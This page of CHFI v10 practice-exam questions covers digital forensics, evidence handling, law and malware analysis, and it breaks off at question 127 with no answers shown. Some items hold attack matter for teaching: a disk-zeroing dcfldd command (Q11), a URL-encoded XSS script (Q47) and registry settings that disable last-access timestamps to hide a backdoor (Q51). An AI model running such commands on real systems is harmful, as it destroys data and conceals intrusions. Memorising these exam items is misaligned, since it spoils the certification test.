  • Exam Name: Computer Hacking Forensic Investigator (CHFI-v10)
  • Last Update: Oct 15, 2024
  • Questions and Answers: 704

312-49v10 Practice Exam Questions with Answers Computer Hacking Forensic Investigator (CHFI-v10) Certification

Question # 6

Which of the following applications will allow a forensic investigator to track the user login sessions and user transactions that have occurred on an MS SQL Server?

A.

ApexSQL Audit

B.

netcat

C.

Notepad++

D.

Event Log Explorer

Question # 7

What must an investigator do before disconnecting an iPod from any type of computer?

A.

Unmount the iPod

B.

Mount the iPod

C.

Disjoin the iPod

D.

Join the iPod

Question # 8

Cylie is investigating a network breach at a state organization in Florida. She discovers that the intruders were able to gain access into the company firewalls by overloading them with IP packets. Cylie then discovers through her investigation that the intruders hacked into the company phone system and used the hard drives on their PBX system to store shared music files. What would this attack on the company PBX system be called?

A.

Phreaking

B.

Squatting

C.

Crunching

D.

Pretexting

Question # 9

Which among the following is an act passed by the U.S. Congress in 2002 to protect investors from the possibility of fraudulent accounting activities by corporations?

A.

HIPAA

B.

GLBA

C.

SOX

D.

FISMA

Question # 10

Which of the following are small pieces of data sent from a website and stored on the user’s computer by the user’s web browser to track, validate, and maintain specific user information?

A.

Temporary Files

B.

Open files

C.

Cookies

D.

Web Browser Cache

Question # 11

Preparing an image drive to copy files to is the first step in Linux forensics. For this purpose, what would the following command accomplish?

dcfldd if=/dev/zero of=/dev/hda bs=4096 conv=noerror,sync

A.

Fill the disk with zeros

B.

Low-level format

C.

Fill the disk with 4096 zeros

D.

Copy files from the master disk to the slave disk on the secondary IDE controller

Question # 12

What must an attorney do first before you are called to testify as an expert?

A.

Qualify you as an expert witness

B.

Read your curriculum vitae to the jury

C.

Engage in damage control

D.

Prove that the tools you used to conduct your examination are perfect

Question # 13

What malware analysis operation can the investigator perform using the jv16 tool?

A.

Files and Folder Monitor

B.

Installation Monitor

C.

Network Traffic Monitoring/Analysis

D.

Registry Analysis/Monitoring

Question # 14

Which of the following tools is not a data acquisition hardware tool?

A.

UltraKit

B.

Atola Insight Forensic

C.

F-Response Imager

D.

Triage-Responder

Question # 15

Which of the following Perl scripts will help an investigator to access the executable image of a process?

A.

Lspd.pl

B.

Lpsi.pl

C.

Lspm.pl

D.

Lspi.pl

Question # 16

What is the investigator trying to view by issuing the command displayed in the following screenshot?

[Screenshot of the command is not reproduced here]

A.

List of services stopped

B.

List of services closed recently

C.

List of services recently started

D.

List of services installed

Question # 17

Which of the following registry hives gives the configuration information about which application was used to open various files on the system?

A.

HKEY_CLASSES_ROOT

B.

HKEY_CURRENT_CONFIG

C.

HKEY_LOCAL_MACHINE

D.

HKEY_USERS

Question # 18

This type of testimony is presented by someone who does the actual fieldwork and does not offer a view in court.

A.

Civil litigation testimony

B.

Expert testimony

C.

Victim advocate testimony

D.

Technical testimony

Question # 19

At what layer does a cross-site scripting attack occur?

A.

Presentation

B.

Application

C.

Session

D.

Data Link

Question # 20

What encryption technology is used by Password Keeper on BlackBerry devices?

A.

3DES

B.

AES

C.

Blowfish

D.

RC5

Question # 21

Jason discovered a file named $RIYG6VR.doc in C:\$Recycle.Bin\ while analyzing a hard disk image for deleted data. What inferences can he make from the file name?

A.

It is a doc file deleted in seventh sequential order

B.

RIYG6VR.doc is the name of the doc file deleted from the system

C.

It is a file deleted from R drive

D.

It is a deleted doc file

Question # 22

What does 254 represent in ICCID 89254021520014515744?

A.

Industry Identifier Prefix

B.

Country Code

C.

Individual Account Identification Number

D.

Issuer Identifier Number

Question # 23

Given the drive dimensions as follows and assuming a sector has 512 bytes, what is the capacity of the described hard drive?

22,164 cylinders/disk

80 heads/cylinder

63 sectors/track

A.

53.26 GB

B.

57.19 GB

C.

11.17 GB

D.

10 GB

Question # 24

Which of the following files contains the traces of the applications installed, run, or uninstalled from a system?

A.

Shortcut Files

B.

Virtual files

C.

Prefetch Files

D.

Image Files

Question # 25

A picture file is recovered from a computer under investigation. During the investigation process, the file is enlarged 500% to get a better view of its contents. The picture quality is not degraded at all from this process. What kind of picture is this file?

A.

Raster image

B.

Vector image

C.

Metafile image

D.

Catalog image

Question # 26

When marking evidence that has been collected with the “aaa/ddmmyy/nnnn/zz” format, what does the “nnnn” denote?

A.

The initials of the forensics analyst

B.

The sequence number for the parts of the same exhibit

C.

The year the evidence was taken

D.

The sequential number of the exhibits seized by the analyst

Question # 27

In Steganalysis, which of the following describes a Known-stego attack?

A.

The hidden message and the corresponding stego-image are known

B.

During the communication process, active attackers can change cover

C.

Original and stego-object are available and the steganography algorithm is known

D.

Only the steganography medium is available for analysis

Question # 28

Which of the following statements is incorrect when preserving digital evidence?

A.

Verify whether the monitor is on, off, or in sleep mode

B.

Turn on the computer and extract Windows event viewer log files

C.

Remove the plug from the power router or modem

D.

Document the actions and changes that you observe in the monitor, computer, printer, or in other peripherals

Question # 29

What is the purpose of using Obfuscator in malware?

A.

Execute malicious code in the system

B.

Avoid encryption while passing through a VPN

C.

Avoid detection by security mechanisms

D.

Propagate malware to other connected devices

Question # 30

Fred, a cybercrime investigator for the FBI, finished storing a solid-state drive in a static-resistant bag and filled out the chain of custody form. Two days later, John grabbed the solid-state drive and created a clone of it (with write blockers enabled) in order to investigate the drive. He did not document the chain of custody, though. When John was finished, he put the solid-state drive back in the static-resistant bag and placed it back in the evidence locker. A day later, the court trial began and, upon presenting the evidence and the supporting documents, the chief justice outright rejected them. Which of the following statements strongly supports the reason for rejecting the evidence?

A.

Block clones cannot be created with solid-state drives

B.

Write blockers were used while cloning the evidence

C.

John did not document the chain of custody

D.

John investigated the clone instead of the original evidence itself

Question # 31

Which of the following malware targets Android mobile devices and installs a backdoor that remotely installs applications from an attacker-controlled server?

A.

Felix

B.

XcodeGhost

C.

xHelper

D.

Unflod

Question # 32

Randy has extracted data from an old version of a Windows-based system and discovered the info file Dc5.txt in the system recycle bin. What does the file name denote?

A.

A text file deleted from C drive in sixth sequential order

B.

A text file deleted from C drive in fifth sequential order

C.

A text file copied from D drive to C drive in fifth sequential order

D.

A text file copied from C drive to D drive in fifth sequential order

Question # 33

Travis, a computer forensics investigator, is finishing up a case he has been working on for over a month involving copyright infringement and embezzlement. His last task is to prepare an investigative report for the president of the company he has been working for. Travis must submit a hard copy and an electronic copy to this president. In what electronic format should Travis send this report?

A.

TIFF-8

B.

DOC

C.

WPD

D.

PDF

Question # 34

In the following email header, where did the email first originate from?

[Screenshot of the email header is not reproduced here]

A.

Somedomain.com

B.

Smtp1.somedomain.com

C.

Simon1.state.ok.gov.us

D.

David1.state.ok.gov.us

Question # 35

Why is it still possible to recover files that have been emptied from the Recycle Bin on a Windows computer?

A.

The data is still present until the original location of the file is used

B.

The data is moved to the Restore directory and is kept there indefinitely

C.

The data will reside in the L2 cache on a Windows computer until it is manually deleted

D.

It is not possible to recover data that has been emptied from the Recycle Bin

Question # 36

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

A.

Security Administrator

B.

Network Administrator

C.

Director of Information Technology

D.

Director of Administration

Question # 37

Brian has the job of analyzing malware for a software security company. Brian has set up a virtual environment that includes virtual machines running various versions of OSes. Additionally, Brian has set up separated virtual networks within this environment. The virtual environment does not connect to the company's intranet nor does it connect to the external Internet. With everything set up, Brian now received an executable file from a client that has undergone a cyberattack. Brian ran the executable file in the virtual environment to see what it would do. What type of analysis did Brian perform?

A.

Static malware analysis

B.

Status malware analysis

C.

Dynamic malware analysis

D.

Static OS analysis

Question # 38

Which of the following file formats allows the user to compress the acquired data as well as keep it randomly accessible?

A.

Proprietary Format

B.

Generic Forensic Zip (gfzip)

C.

Advanced Forensic Framework 4

D.

Advanced Forensics Format (AFF)

Question # 39

Which of the following statements is true regarding SMTP Server?

A.

SMTP Server breaks the recipient’s address into Recipient’s name and his/her designation before passing it to the DNS Server

B.

SMTP Server breaks the recipient's address into Recipient’s name and recipient’s address before passing it to the DNS Server

C.

SMTP Server breaks the recipient’s address into Recipient’s name and domain name before passing it to the DNS Server

D.

SMTP Server breaks the recipient’s address into Recipient’s name and his/her initial before passing it to the DNS Server

Question # 40

Donald made an OS disk snapshot of a compromised Azure VM under a resource group being used by the affected company as part of the forensic analysis process. He then created a VHD file out of the snapshot and stored it in a file share and as a page blob backup in a storage account under a different region. What is the next thing he should do as a security measure?

A.

Recommend changing the access policies followed by the company

B.

Delete the snapshot from the source resource group

C.

Delete the OS disk of the affected VM altogether

D.

Create another VM by using the snapshot

Question # 41

Which of the following web browsers uses the Extensible Storage Engine (ESE) database format to store browsing records, including history, cache, and cookies?

A.

Safari

B.

Mozilla Firefox

C.

Microsoft Edge

D.

Google Chrome

Question # 42

Which of the following files gives information about the client sync sessions in Google Drive on Windows?

A.

sync_log.log

B.

Sync_log.log

C.

sync.log

D.

Sync.log

Question # 43

Which of the following reports are delivered under oath to a board of directors/managers/panel of the jury?

A.

Written Formal Report

B.

Verbal Formal Report

C.

Verbal Informal Report

D.

Written Informal Report

Question # 44

To which phase of the Computer Forensics Investigation Process does the Planning and Budgeting of a Forensics Lab belong?

A.

Post-investigation Phase

B.

Reporting Phase

C.

Pre-investigation Phase

D.

Investigation Phase

Question # 45

Which of the following tools can the investigator use to analyze the network to detect Trojan activities?

A.

Regshot

B.

TRIPWIRE

C.

RAM Computer

D.

Capsa

Question # 46

Paul is a computer forensics investigator working for Tyler & Company Consultants. Paul has been called upon to help investigate a computer hacking ring broken up by the local police. Paul begins to inventory the PCs found in the hackers' hideout. Paul then comes across a PDA left by them that is attached to a number of different peripheral devices. What is the first step that Paul must take with the PDA to ensure the integrity of the investigation?

A.

Place PDA, including all devices, in an antistatic bag

B.

Unplug all connected devices

C.

Power off all devices if currently on

D.

Photograph and document the peripheral devices

Question # 47

%3cscript%3ealert("XXXXXXXX")%3c/script%3e is a script obtained from a Cross-Site Scripting attack. What type of encoding has the attacker employed?

A.

Double encoding

B.

Hex encoding

C.

Unicode

D.

Base64

Question # 48

Sally accessed the computer system that holds trade secrets of the company where she is employed. She knows she accessed it without authorization and that all access (authorized and unauthorized) to this computer is monitored. To cover her tracks, Sally deleted the log entries on this computer. What among the following best describes her action?

A.

Password sniffing

B.

Anti-forensics

C.

Brute-force attack

D.

Network intrusion

Question # 49

An International Mobile Equipment Identifier (IMEI) is a 15-digit number that indicates the manufacturer, model type, and country of approval for GSM devices. The first eight digits of an IMEI number, which provide information about the model and origin of the mobile device, are also known as:

A.

Type Allocation Code (TAC)

B.

Integrated Circuit Code (ICC)

C.

Manufacturer Identification Code (MIC)

D.

Device Origin Code (DOC)

Question # 50

Which of the following is non-zero data that an application allocates on a hard disk cluster in systems running on Windows OS?

A.

Sparse File

B.

Master File Table

C.

Meta Block Group

D.

Slack Space

Question # 51

An attacker successfully gained access to a remote Windows system and plans to install persistent backdoors on it. Before that, to avoid getting detected in future, he wants to cover his tracks by disabling the last-accessed timestamps of the machine. What would he do to achieve this?

A.

Set the registry value of HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 0

B.

Run the command fsutil behavior set disablelastaccess 0

C.

Set the registry value of HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 1

D.

Run the command fsutil behavior set enablelastaccess 0

Question # 52

Data Files contain Multiple Data Pages, which are further divided into Page Header, Data Rows, and Offset Table. Which of the following is true for Data Rows?

A.

Data Rows store the actual data

B.

Data Rows present Page type, Page ID, and so on

C.

Data Rows point to the location of actual data

D.

Data Rows spreads data across multiple databases

Question # 53

Consider that you are investigating a machine running a Windows OS released prior to Windows Vista. You are trying to gather information about the deleted files by examining the master database file named INFO2 located at C:\Recycler\. You read an entry named "Dd5.exe". What does Dd5.exe mean?

A.

D drive, fifth file deleted, a .exe file

B.

D drive, fourth file restored, a .exe file

C.

D drive, fourth file deleted, a .exe file

D.

D drive, sixth file deleted, a .exe file

Question # 54

What happens to the header of the file once it is deleted from the Windows OS file systems?

A.

The OS replaces the first letter of a deleted file name with a hex byte code: E5h

B.

The OS replaces the entire hex byte coding of the file.

C.

The hex byte coding of the file remains the same, but the file location differs

D.

The OS replaces the second letter of a deleted file name with a hex byte code: Eh5

Question # 55

What command-line tool enables a forensic investigator to establish communication between an Android device and a forensic workstation in order to perform data acquisition from the device?

A.

APK Analyzer

B.

SDK Manager

C.

Android Debug Bridge

D.

Xcode

Question # 56

Which of the following forensic tools allows an investigator to detect and extract hidden streams on an NTFS drive?

A.

Stream Detector

B.

TimeStomp

C.

Autopsy

D.

analyzeMFT

Question # 57

Which of the following is a precomputed table containing word lists like dictionary files and brute force lists and their hash values?

A.

Directory Table

B.

Rainbow Table

C.

Master file Table (MFT)

D.

Partition Table

Question # 58

In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?

A.

Determines the data associated with value EnablePrefetcher

B.

Monitors the first 10 seconds after the process is started

C.

Checks whether the data is processed

D.

Checks hard page faults and soft page faults

Question # 59

The information security manager at a national legal firm has received several alerts from the intrusion detection system that a known attack signature was detected against the organization's file server. What should the information security manager do first?

A.

Report the incident to senior management

B.

Update the anti-virus definitions on the file server

C.

Disconnect the file server from the network

D.

Manually investigate to verify that an incident has occurred

Question # 60

Sniffers that place NICs in promiscuous mode work at what layer of the OSI model?

A.

Network

B.

Transport

C.

Physical

D.

Data Link

Question # 61

What is the location of the binary files required for the functioning of the OS in a Linux system?

A.

/run

B.

/bin

C.

/root

D.

/sbin

Question # 62

Netstat is a tool for collecting information regarding network connections. It provides a simple view of TCP and UDP connections, and their state and network traffic statistics. Which of the following commands shows you the TCP and UDP network connections, listening ports, and the identifiers?

A.

netstat -r

B.

netstat -ano

C.

netstat -b

D.

netstat -s

Question # 63

What is the slave device connected to the secondary IDE controller on a Linux OS referred to as?

A.

hda

B.

hdd

C.

hdb

D.

hdc

Question # 64

UEFI is a specification that defines a software interface between an OS and platform firmware. Where does this interface store information about files present on a disk?

A.

BIOS-MBR

B.

GUID Partition Table (GPT)

C.

Master Boot Record (MBR)

D.

BIOS Parameter Block

Question # 65

James, a hacker, identifies a vulnerability in a website. To exploit the vulnerability, he visits the login page and notes down the session ID that is created. He appends this session ID to the login URL and shares the link with a victim. Once the victim logs into the website using the shared URL, James reloads the webpage (containing the URL with the session ID appended) and now, he can browse the active session of the victim. Which attack did James successfully execute?

A.

Cross Site Request Forgery

B.

Cookie Tampering

C.

Parameter Tampering

D.

Session Fixation Attack

Question # 66

Adam, a forensic analyst, is preparing VMs for analyzing malware. Which of the following is NOT a best practice?

A.

Isolating the host device

B.

Installing malware analysis tools

C.

Using network simulation tools

D.

Enabling shared folders

Question # 67

Richard is extracting volatile data from a system and uses the command doskey /history. What is he trying to extract?

A.

Events history

B.

Previously typed commands

C.

History of the browser

D.

Passwords used across the system

Question # 68

Harold is a computer forensics investigator working for a consulting firm out of Atlanta, Georgia. Harold is called upon to help with a corporate espionage case in Miami, Florida. Harold assists in the investigation by pulling all the data from the computers allegedly used in the illegal activities. He finds that two suspects in the company were stealing sensitive corporate information and selling it to competing companies. From the email and instant messenger logs recovered, Harold has discovered that the two employees notified the buyers by writing symbols on the back of specific stop signs. This way, the buyers knew when and where to meet with the alleged suspects to buy the stolen material. What type of steganography did these two suspects use?

A.

Text semagram

B.

Visual semagram

C.

Grill cipher

D.

Visual cipher

Question # 69

Which of the following refers to the process of the witness being questioned by the attorney who called the latter to the stand?

A.

Witness Authentication

B.

Direct Examination

C.

Expert Witness

D.

Cross Questioning

Question # 70

How will you categorize a cybercrime that took place within a CSP’s cloud environment?

A.

Cloud as a Subject

B.

Cloud as a Tool

C.

Cloud as an Audit

D.

Cloud as an Object

Question # 71

What file is processed at the end of a Windows XP boot to initialize the logon dialog box?

A.

NTOSKRNL.EXE

B.

NTLDR

C.

LSASS.EXE

D.

NTDETECT.COM

Question # 72

Consider a scenario where the perpetrator of a dark web crime has uninstalled Tor browser from their computer after committing the crime. The computer has been seized by law enforcement so they can investigate it for artifacts of Tor browser usage. Which of the following should the investigators examine to establish the use of Tor browser on the suspect machine?

A.

Swap files

B.

Files in Recycle Bin

C.

Security logs

D.

Prefetch files

Question # 73

Which set of anti-forensic tools/techniques allows a program to compress and/or encrypt an executable file to hide attack tools from being detected by reverse-engineering or scanning?

A.

Packers

B.

Emulators

C.

Password crackers

D.

Botnets

Question # 74

An EC2 instance storing critical data of a company got infected with malware. The forensics team took the EBS volume snapshot of the affected instance to perform further analysis and collected other data of evidentiary value. What should be their next step?

A.

They should pause the running instance

B.

They should keep the instance running as it stores critical data

C.

They should terminate all instances connected via the same VPC

D.

They should terminate the instance after taking necessary backup

Question # 75

Which Federal Rule of Evidence speaks about the hearsay exception where the availability of the declarant is immaterial and certain characteristics of the declarant such as present sense impression, excited utterance, and recorded recollection are also observed while giving their testimony?

A.

Rule 801

B.

Rule 802

C.

Rule 804

D.

Rule 803

Question # 76

You are an information security analyst at a large pharmaceutical company. While performing a routine review of audit logs, you have noticed a significant amount of egress traffic to various IP addresses on destination port 22 during off-peak hours. You researched some of the IP addresses and found that many of them are in Eastern Europe. What is the most likely cause of this traffic?

A.

Malicious software on an internal system is downloading research data from partner SFTP servers in Eastern Europe

B.

Internal systems are downloading automatic Windows updates

C.

Data is being exfiltrated by an advanced persistent threat (APT)

D.

The organization's primary internal DNS server has been compromised and is performing DNS zone transfers to malicious external entities

Question # 77

Which of the following Windows event logs records events related to device drivers and hardware changes?

A.

Forwarded events log

B.

System log

C.

Application log

D.

Security log

Question # 78

During an investigation, the first responders stored mobile devices in specific containers to provide network isolation. All the following are examples of such pieces of equipment, except for:

A.

Wireless StrongHold bag

B.

VirtualBox

C.

Faraday bag

D.

RF shield box

Question # 79

Frank, a cloud administrator in his company, needs to take a backup of the OS disks of two Azure VMs that store business-critical data. Which type of Azure blob storage can he use for this purpose?

A.

Append blob

B.

Medium blob

C.

Block blob

D.

Page blob

Question # 80

Jack is reviewing file headers to verify the file format and hopefully find more information about the file. After a careful review of the data chunks through a hex editor, Jack finds the binary value 0xffd8ff. Based on the above information, what type of format is the file/image saved as?

A.

BMP

B.

GIF

C.

ASCII

D.

JPEG

Question # 81

James, a forensics specialist, was tasked with investigating a Windows XP machine that was used for malicious online activities. During the investigation, he recovered certain deleted files from the Recycle Bin to identify attack clues.

Identify the location of Recycle Bin in Windows XP system.

A.

Drive:\$Recycle.Bin\

B.

local/share/Trash

C.

Drive:\RECYCLER\

D.

Drive:\RECYCLED\

Question # 82

Which network attack is described by the following statement?

“At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries.”

A.

DDoS

B.

Sniffer Attack

C.

Buffer Overflow

D.

Man-in-the-Middle Attack

Question # 83

An investigator is searching through the firewall logs of a company and notices ICMP packets that are larger than 65,536 bytes. What type of activity is the investigator seeing?

A.

Smurf

B.

Ping of death

C.

Fraggle

D.

Nmap scan

Question # 84

Pagefile.sys is a virtual memory file used to expand the physical memory of a computer. Select the registry path for the page file:

A.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

B.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\System Management

C.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Device Management

D.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters

Question # 85

What does 63.78.199.4(161) denote in the following Cisco router log?

Mar 14 22:57:53.425 EST: %SEC-6-IPACCESSLOGP: list internet-inbound denied udp 66.56.16.77(1029) -> 63.78.199.4(161), 1 packet

A.

Destination IP address

B.

Source IP address

C.

Login IP address

D.

None of the above

Question # 86

Microsoft Security IDs are available in Windows Registry Editor. The path to locate IDs in Windows 7 is:

A.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

B.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProfileList

C.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegList

D.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Regedit

Question # 87

Steven has been given the task of designing a computer forensics lab for the company he works for. He has found documentation on all aspects of how to design a lab except the number of exits needed. How many exits should Steven include in his design for the computer forensics lab?

A.

Three

B.

One

C.

Two

D.

Four

Question # 88

When making the preliminary investigations in a sexual harassment case, how many investigators is it recommended to have?

A.

One

B.

Two

C.

Three

D.

Four

Question # 89

Buffer overflow vulnerabilities in web applications occur when the application fails to guard its buffer properly and allows writing beyond its maximum size. Thus, it overwrites the _________. There are multiple forms of buffer overflow, including a Heap Buffer Overflow and a Format String Attack.

A.

Adjacent buffer locations

B.

Adjacent string locations

C.

Adjacent bit blocks

D.

Adjacent memory locations

Question # 90

Jim’s company regularly performs backups of their critical servers. But the company can’t afford to send backup tapes to an off-site vendor for long-term storage and archiving. Instead, Jim’s company keeps the backup tapes in a safe in the office. Jim’s company is audited each year, and the results from this year’s audit show a risk because backup tapes aren’t stored off-site. The Manager of Information Technology has a plan to take the backup tapes home with him and wants to know what two things he can do to secure the backup tapes while in transit?

A.

Encrypt the backup tapes and use a courier to transport them.

B.

Encrypt the backup tapes and transport them in a lock box.

C.

Degauss the backup tapes and transport them in a lock box.

D.

Hash the backup tapes and transport them in a lock box.

Question # 91

In which implementation of RAID will the image of a Hardware RAID volume be different from the image taken separately from the disks?

A.

RAID 1

B.

The images will always be identical because data is mirrored for redundancy

C.

RAID 0

D.

It will always be different

Question # 92

After suspecting a change in MS-Exchange Server storage archive, the investigator has analyzed it. Which of the following components is not an actual part of the archive?

A.

PRIV.STM

B.

PUB.EDB

C.

PRIV.EDB

D.

PUB.STM

Question # 93

Which of these ISO standards defines the file system for optical storage media, such as CD-ROM and DVD-ROM?

A.

ISO 9660

B.

ISO 13346

C.

ISO 9960

D.

ISO 13490

Question # 94

Which of the following setups should a tester choose to analyze malware behavior?

A.

A virtual system with internet connection

B.

A normal system without internet connection

C.

A normal system with internet connection

D.

A virtual system with network simulation for internet connection

Question # 95

Hard disk data addressing is a method of allotting addresses to each _______ of data on a hard disk.

A.

Physical block

B.

Operating system block

C.

Hard disk block

D.

Logical block

Question # 96

What is the name of the first reserved sector in a File Allocation Table (FAT) file system?

A.

Volume Boot Record

B.

Partition Boot Sector

C.

Master Boot Record

D.

BIOS Parameter Block

Question # 97

What is the role of Alloc.c in Apache core?

A.

It handles allocation of resource pools

B.

It is useful for reading and handling of the configuration files

C.

It takes care of all the data exchange and socket connections between the client and the server

D.

It handles server start-ups and timeouts

Question # 98

Which list contains the most recent actions performed by a Windows User?

A.

MRU

B.

Activity

C.

Recents

D.

Windows Error Log

Question # 99

The working of the Tor browser is based on which of the following concepts?

A.

Both static and default routing

B.

Default routing

C.

Static routing

D.

Onion routing

Question # 100

Which of the following is the most effective tool for acquiring volatile data from a Windows-based system?

A.

Coreography

B.

Datagrab

C.

Ethereal

D.

Helix

Question # 101

Which one of the following is not a first response procedure?

A.

Preserve volatile data

B.

Fill forms

C.

Crack passwords

D.

Take photos

Question # 102

An investigator wants to extract passwords from the SAM and SYSTEM files. Which tool can the investigator use to obtain a list of users, passwords, and their hashes in this case?

A.

PWdump7

B.

HashKey

C.

Nuix

D.

FileMerlin

Question # 103

Which of the following statements pertaining to First Response is true?

A.

First Response is a part of the investigation phase

B.

First Response is a part of the post-investigation phase

C.

First Response is a part of the pre-investigation phase

D.

First Response is neither a part of pre-investigation phase nor a part of investigation phase. It only involves attending to a crime scene first and taking measures that assist forensic investigators in executing their tasks in the investigation phase more efficiently

Question # 104

Maria has executed a suspicious executable file in a controlled environment and wants to see, via Windows Event Viewer, whether the file adds or modifies any registry value after execution. Which of the following event IDs should she look for in this scenario?

A.

Event ID 4657

B.

Event ID 4624

C.

Event ID 4688

D.

Event ID 7040

Question # 105

Assume there is a file named myfile.txt on the C: drive that contains hidden data streams. Which of the following commands would you issue to display the contents of a data stream?

A.

echo text > program:source_file

B.

myfile.dat:stream1

C.

C:\>MORE < myfile.txt:stream1

D.

C:\>ECHO text_message > myfile.txt:stream1

Question # 106

Data density of a disk drive is calculated by using _______

A.

Slack space, bit density, and slack density.

B.

Track space, bit area, and slack space.

C.

Track density, areal density, and slack density.

D.

Track density, areal density, and bit density.

Question # 107

Steve received a mail that seemed to have come from his bank. The mail has instructions for Steve to click on a link and provide information to avoid the suspension of his account. The link in the mail redirected him to a form asking for details such as name, phone number, date of birth, credit card number or PIN, CVV code, SSN, and email address. On a closer look, Steve realized that the URL of the form is not the same as that of his bank's. Identify the type of external attack performed by the attacker in the above scenario.

A.

Phishing

B.

Espionage

C.

Tailgating

D.

Brute-force

Question # 108

Chloe is a forensic examiner who is currently cracking hashed passwords for a crucial mission, hoping to solve the case. She is using a lookup table for recovering a plaintext password from ciphertext; it contains a word list and a brute-force list along with their computed hash values. Chloe is also using a graphical generator that supports SHA1.

a. What password technique is being used?

b. What tool is Chloe using?

A.

a. Dictionary attack b. Cisco PIX

B.

a. Cain & Abel b. Rten

C.

a. Brute-force b. MScache

D.

a. Rainbow Tables b. Winrtgen

Question # 109

A computer forensics investigator or forensic analyst is a specially trained professional who works with law enforcement as well as private businesses to retrieve information from computers and other types of data storage devices. For this, the analyst should have an excellent working knowledge of all aspects of the computer. Which of the following is not a duty of the analyst during a criminal investigation?

A.

To create an investigation report

B.

To fill the chain of custody

C.

To recover data from suspect devices

D.

To enforce the security of all devices and software in the scene

Question # 110

Edgar is part of the FBI's forensic media and malware analysis team; he is analyzing a current malware sample and is conducting a thorough examination of the suspect system, network, and other connected devices. Edgar's approach is to execute the malware code to learn how it interacts with the host system and what its impact on it is. He is also using a virtual machine and a sandbox environment.

What type of malware analysis is Edgar performing?

A.

Malware disassembly

B.

VirusTotal analysis

C.

Static analysis

D.

Dynamic malware analysis/behavioral analysis

Question # 111

Which of the following methods of mobile device data acquisition captures all the data present on the device, as well as all deleted data and access to unallocated space?

A.

Manual acquisition

B.

Logical acquisition

C.

Direct acquisition

D.

Physical acquisition

Question # 112

Ronald, a forensic investigator, has been hired by a financial services organization to investigate an attack on their MySQL database server, which is hosted on a Windows machine named WIN-DTRAI83202X. Ronald wants to retrieve information on the changes that have been made to the database. Which of the following files should Ronald examine for this task?

A.

relay-log.info

B.

WIN-DTRAI83202X-relay-bin.index

C.

WIN-DTRAI83202X-slow.log

D.

WIN-DTRAI83202X-bin.nnnnnn

Question # 113

Which of the following statements is true with respect to SSDs (solid-state drives)?

A.

Like HDDs, SSDs also have moving parts

B.

SSDs cannot store non-volatile data

C.

SSDs contain tracks, clusters, and sectors to store data

D.

Faster data access, lower power usage, and higher reliability are some of the m

Question # 114

You are a forensic investigator who is analyzing a hard drive that was recently collected as evidence. You have been unsuccessful at locating any meaningful evidence within the file system and suspect a drive wiping utility may have been used. You have reviewed the keys within the software hive of the Windows registry and did not find any drive wiping utilities. How can you verify that drive wiping software was used on the hard drive?

A.

Document in your report that you suspect a drive wiping utility was used, but no evidence was found

B.

Check the list of installed programs

C.

Load various drive wiping utilities offline, and export previous run reports

D.

Look for distinct repeating patterns on the hard drive at the bit level

Question # 115

When investigating a system, the forensics analyst discovers that malicious scripts were injected into benign and trusted websites. The attacker used a web application to send malicious code, in the form of a browser-side script, to a different end user. What attack was performed here?

A.

Brute-force attack

B.

Cookie poisoning attack

C.

Cross-site scripting attack

D.

SQL injection attack

Question # 116

For the purpose of preserving the evidentiary chain of custody, which of the following labels is not appropriate?

A.

Relevant circumstances surrounding the collection

B.

General description of the evidence

C.

Exact location the evidence was collected from

D.

SSN of the person collecting the evidence

Question # 117

What is the extension used by Windows OS for shortcut files present on the machine?

A.

.log

B.

.pf

C.

.lnk

D.

.dat

Question # 118

The storage location of the Recycle Bin for NTFS file systems (Windows Vista and later) is:

A.

Drive:\$Recycle.Bin

B.

Drive:\RECYCLE.BIN

C.

Drive:\RECYCLER

D.

Drive:\RECYCLED

Question # 119

Harry has collected a suspicious executable file from an infected system and seeks to reverse its machine code to instructions written in assembly language. Which tool should he use for this purpose?

A.

Ollydbg

B.

oledump

C.

HashCalc

D.

BinText

Question # 120

To understand the impact of a malicious program after the booting process and to collect recent information from the disk partition, an investigator should evaluate the content of the:

A.

MBR

B.

GRUB

C.

UEFI

D.

BIOS

Question # 121

A forensic examiner encounters a computer with a failed OS installation and the master boot record (MBR) or partition sector damaged. Which of the following tools can find and restore files and information on the disk?

A.

Helix

B.

R-Studio

C.

NetCat

D.

Wireshark

Question # 122

An investigator needs to perform data acquisition from a storage medium without altering its contents, to maintain the integrity of the content. The approach adopted by the investigator relies upon enabling read-only access to the storage medium. Which tool should the investigator integrate into his/her procedures to accomplish this task?

A.

BitLocker

B.

Data duplication tool

C.

Backup tool

D.

Write blocker

Question # 123

Which layer in the IoT architecture is comprised of hardware parts such as sensors, RFID tags, and devices that play an important role in data collection?

A.

Middleware layer

B.

Edge technology layer

C.

Application layer

D.

Access gateway layer

Question # 124

Robert needs to copy an OS disk snapshot of a compromised VM to a storage account in a different region for further investigation. Which of the following should he use in this scenario?

A.

Azure CLI

B.

Azure Monitor

C.

Azure Active Directory

D.

Azure Portal

Question # 125

During a forensic investigation, a large number of files were collected. The investigator needs to evaluate ownership and accountability of those files. Therefore, he begins to identify attributes such as "author name," "organization name," "network name," or any additional supporting data that is meant for identifying the owner. Which term describes these attributes?

A.

Data header

B.

Data index

C.

Metabase

D.

Metadata

Question # 126

A breach resulted from a malware attack that evaded detection and compromised the machine memory without installing any software or accessing the hard drive. What technique did the adversaries use to deliver the attack?

A.

Fileless

B.

Trojan

C.

JavaScript

D.

Spyware

Question # 127

